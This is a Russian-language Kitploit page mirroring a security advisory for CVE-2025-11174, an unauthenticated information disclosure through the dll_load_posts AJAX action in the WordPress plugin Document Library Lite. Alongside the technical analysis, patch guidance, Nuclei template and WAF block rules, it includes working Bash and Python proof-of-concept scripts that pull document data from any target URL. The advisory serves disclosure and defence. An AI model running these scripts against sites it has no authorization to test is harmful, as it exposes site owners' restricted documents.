Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-11174 — Document Library Lite <= 1.1.6 - Missing Authorization to Sensitive Information Exposure | CVE-2025-11174 | Kitploit
Инструменты/GitHubGitHub/snailsploit/cve-2025-11174
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubsnailsploit/cve-2025-11174

CVE-2025-11174

Document Library Lite <= 1.1.6 - Missing Authorization to Sensitive Information Exposure | CVE-2025-11174

Репозиторий
3 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-11174: Неавторизованное раскрытие информации в плагине Document Library Lite для WordPress

CVE CVSS Score WordPress Plugin CWE-862 Wordfence

Ключевые слова: CVE-2025-11174, уязвимость Document Library Lite, раскрытие информации, безопасность WordPress, неавторизованный AJAX эксплойт, уязвимость плагина WordPress, CWE-862, безопасность плагина документов WordPress, обход авторизации, CVE WordPress 2025

Содержание

  • Обзор
  • Детали уязвимости
  • Технический анализ
  • Вектор атаки
  • Доказательство концепции
  • Руководство по устранению
  • Обнаружение
  • CVSS метрики
  • Ссылки
  • Благодарности
  • Контакт для безопасности

Обзор

Уязвимость раскрытия информации в плагине Document Library Lite для WordPress (CVE-2025-11174) — ошибка безопасности, позволяющая неавторизованным пользователям получать доступ к конфиденциальным данным документов в плагине библиотеки документов WordPress.

Была обнаружена критическая уязвимость обхода авторизации в плагине Document Library Lite для WordPress, которая позволяет неавторизованным злоумышленникам получать доступ к конфиденциальной информации о документах без надлежащей аутентификации.

Обнаружено: Kai Aizen и Avraham Shemesh (SnailSploit)
Опубликовано: 1 ноября 2025 г.
Оценка CVSS: 5.3 (Средняя)
CWE: CWE-862 — Отсутствие авторизации
Плагин: Document Library Lite
Вендор: Barn2 Plugins
Тип атаки: Неавторизованное раскрытие информации
Требуемые привилегии: Нет (Неавторизованная атака)

Детали уязвимости

Описание

Плагин Document Library Lite для WordPress содержит уязвимость неправильной авторизации во всех версиях до 1.1.6 включительно. Плагин предоставляет неавторизованное AJAX-действие dll_load_posts, которое возвращает JSON-таблицу данных документов без проверки nonce или прав.

Воздействие

Эта уязвимость позволяет неавторизованным злоумышленникам:

  • Получать доступ к метаданным документов без авторизации
  • Извлекать списки документов, которые должны быть ограничены
  • Просматривать информацию о документах, предназначенную только для аутентифицированных пользователей
  • Перечислять документы, хранящиеся в библиотеке документов

Примечание: Оценка CVSS 5.3 (средняя степень серьезности) отражает ограниченное раскрытие информации. Хотя уязвимость позволяет неавторизованным пользователям получать доступ к данным документов, воздействие на конфиденциальность оценено как Низкое, без воздействия на целостность или доступность.

Затронутые версии

  • Уязвимые: Все версии ≤ 1.1.6
  • Исправленные: Версия 1.1.7 и выше

CVSS v3.1 Метрики

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Расшифровка CVSS v3.1:

  • Вектор атаки (AV): Сеть — уязвимость может быть использована удалённо через сеть
  • Сложность атаки (AC): Низкая — для эксплуатации не требуется особых условий
  • Требуемые привилегии (PR): Нет — для атаки не требуется аутентификация или привилегии
  • Взаимодействие с пользователем (UI): Нет — эксплойт работает без какого-либо взаимодействия с пользователем
  • Область действия (S): Не изменена — уязвимость затрагивает только уязвимый компонент
  • Влияние на конфиденциальность (C): Низкое — ограниченное раскрытие информации
  • Влияние на целостность (I): Нет — воздействия на целостность нет
  • Влияние на доступность (A): Нет — воздействия на доступность нет

Технические детали

Коренная причина уязвимости

AJAX-действие dll_load_posts зарегистрировано без надлежащих проверок аутентификации или авторизации:

root@kitploit:~
// Уязвимый шаблон кода (упрощённо)
add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');

Префикс wp_ajax_nopriv_ указывает, что это действие доступно неаутентифицированным пользователям, а функция обратного вызова не реализует:

  • Проверку nonce
  • Проверку прав
  • Проверку аутентификации пользователя

Вектор атаки

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=dll_load_posts

Уязвимость может быть использована через конечную точку WordPress admin-ajax.php без аутентификации.

Доказательство концепции

⚠️ Только для образовательных целей и авторизованного тестирования

Bash PoC

root@kitploit:~
#!/bin/bash
# CVE-2025-11174 PoC

TARGET_URL="$1"

if [ -z "$TARGET_URL" ]; then
    echo "Usage: $0 <target_url>"
    echo "Example: $0 https://example.com"
    exit 1
fi

echo "[*] CVE-2025-11174 - Document Library Lite Information Disclosure PoC"
echo "[*] Target: $TARGET_URL"
echo ""

# Send request to vulnerable AJAX endpoint
curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "action=dll_load_posts" \
  | python3 -m json.tool

echo ""
echo "[+] If you see document data above, the site is vulnerable!"

Python PoC

root@kitploit:~
#!/usr/bin/env python3
"""
CVE-2025-11174 - Document Library Lite Information Disclosure PoC
For educational and authorized testing purposes only
"""

import requests
import sys
import json

def exploit(target_url):
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
    print(f"[*] Target: {target_url}")
    print(f"[*] AJAX Endpoint: {ajax_url}\n")
    
    data = {'action': 'dll_load_posts'}
    
    try:
        response = requests.post(ajax_url, data=data, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request successful!\n")
            try:
                json_data = response.json()
                print("[+] Retrieved document data:")
                print(json.dumps(json_data, indent=2))
                print("\n[!] Site is VULNERABLE to CVE-2025-11174")
            except json.JSONDecodeError:
                print("[-] No JSON response received")
                print(f"Response: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        print(f"Example: {sys.argv[0]} https://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit(target)

Устранение

Для администраторов сайтов

Немедленные действия:

  1. Обновите плагин Document Library Lite до версии 1.1.7 или выше немедленно
  2. Просмотрите журналы доступа вашего сайта на предмет подозрительных POST-запросов к admin-ajax.php с action=dll_load_posts
  3. Если вы не можете обновиться немедленно, рассмотрите возможность временного отключения плагина

Инструкции по обновлению

Через админ-панель WordPress:

  1. Перейдите в Плагины > Установленные плагины в админке WordPress
  2. Найдите «Document Library Lite»
  3. Нажмите Обновить сейчас, чтобы перейти на версию 1.1.7 или выше
  4. Убедитесь, что обновление прошло успешно

Используя WP-CLI:

root@kitploit:~
wp plugin update document-library-lite

Для разработчиков плагинов

Убедитесь, что все обработчики AJAX реализуют надлежащие средства контроля безопасности:

root@kitploit:~
// Пример правильной безопасности AJAX
add_action('wp_ajax_dll_load_posts', 'dll_load_posts_callback');

function dll_load_posts_callback() {
    // Проверка nonce
    if (!wp_verify_nonce($_POST['nonce'], 'dll_nonce')) {
        wp_die('Invalid nonce');
    }
    
    // Проверка прав
    if (!current_user_can('read')) {
        wp_send_json_error('Insufficient permissions');
        wp_die();
    }
    
    // Ваш безопасный код здесь
}

Обнаружение

Проверка плагина WordPress

root@kitploit:~
# Проверка, установлена ли уязвимая версия
wp plugin list | grep -i "document-library-lite"

Правила сканера безопасности

Шаблон Nuclei:

root@kitploit:~
id: CVE-2025-11174

info:
  name: Document Library Lite - Unauthenticated Information Disclosure
  author: security-research
  severity: medium
  description: Document Library Lite plugin for WordPress is vulnerable to information disclosure
  reference:
    - https://github.com/[your-repo]/CVE-2025-11174
  tags: cve,cve2025,wordpress,wp-plugin,unauth

requests:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php"
    
    body: "action=dll_load_posts"
    
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "data"
          - "recordsTotal"
        condition: and
      
      - type: status
        status:
          - 200

Правила брандмауэра веб-приложений

Правило ModSecurity:

root@kitploit:~
SecRule REQUEST_URI "@contains /wp-admin/admin-ajax.php" \
    "chain,id:1000001,phase:2,t:none,t:urlDecodeUni,t:normalizePathWin,\
    log,deny,status:403,msg:'CVE-2025-11174 Exploit Attempt'"
    SecRule ARGS:action "@streq dll_load_posts" "t:none"

Правило Nginx/OpenResty:

root@kitploit:~
if ($request_uri ~* "admin-ajax\.php") {
    if ($args ~* "action=dll_load_posts") {
        return 403;
    }
}

Хронология

  • 1 ноября 2025 г. — Уязвимость публично раскрыта
  • 1 ноября 2025 г. — Опубликована запись CVE
  • Ноябрь 2025 г. — Выпущен патч (версия 1.1.7)

Ссылки

  • CVE-2025-11174 — CVE.org
  • GitHub Advisory Database
  • Wordfence Intelligence
  • Каталог плагинов WordPress

Благодарности

Исследователи:

  • Avraham Shemesh
  • Kai Aizen — SnailSploit

Процесс раскрытия: Скоординированное раскрытие

Отказ от ответственности

Эта информация предоставлена исключительно для целей исследования безопасности и защиты. Любое использование этой уязвимости в злонамеренных целях незаконно и неэтично. Всегда получайте соответствующее разрешение перед тестированием систем, которые вам не принадлежат.

Контакты

По вопросам или для получения дополнительной информации об этой уязвимости:

  • Эл. почта: [email protected]
  • Веб-сайт: snailsploit.com
  • Организация: SnailSploit Security Research

Последнее обновление: 2 ноября 2025 г.


📚 Документация и автор

Полный writeup этого проекта, методология и связанные исследования находятся на:

https://snailsploit.com/security-research/cves/cve-2025-11174/

Создано Kai Aizen — независимый исследователь безопасности в области наступательных атак.

snailsploit.com · Research · Frameworks · GitHub · LinkedIn · ResearchGate · X/Twitter

Та же атака. Другой субстрат.

Скачать инструмент
МетрикаЗначение
Вектор атакиСеть (AV:N)
Сложность атакиНизкая (AC:L)
Требуемые привилегииНет (PR:N)
Взаимодействие с пользователемНет (UI:N)
Область действияНе изменена (S:U)
КонфиденциальностьНизкая (C:L)
ЦелостностьНет (I:N)
ДоступностьНет (A:N)